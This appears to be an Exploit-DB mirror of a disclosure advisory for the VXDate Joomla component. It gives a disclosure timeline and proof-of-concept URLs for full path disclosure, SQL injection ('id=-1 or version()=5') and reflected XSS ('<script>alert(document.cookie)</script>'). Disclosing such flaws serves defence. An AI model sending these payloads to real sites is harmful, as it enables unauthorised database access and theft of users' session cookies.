exploit-db-mirror/platforms/php/webapps/11790.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

58 lines
1.3 KiB
Text
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

-------------------------------------------------------------------------------------------------------------
I want to warn you about vulnerabilities in component VXDate for Joomla.
-----------------------------
Advisory: Vulnerabilities in VXDate for Joomla
-----------------------------
URL: http://websecurity.com.ua/3849/
-----------------------------
Timeline:
10.05.2009 - found the vulnerabilities.
12.01.2010 - announced at my site.
18.01.2010 - informed developers.
13.03.2010 - disclosed at my site.
-----------------------------
Details:
These are Full path disclosure, SQL Injection and Cross-Site Scripting vulnerabilities.
Full path disclosure:
http://site/index.php?option=com_vxdate&ct=
http://site/index.php?option=com_vxdate&ct=1&md=details&id=
http://site/index.php?option=com_vxdate&ct=1&md=editform&id=
SQL Injection:
http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5
http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5
XSS:
http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Vulnerable are potentially all versions of VXDate.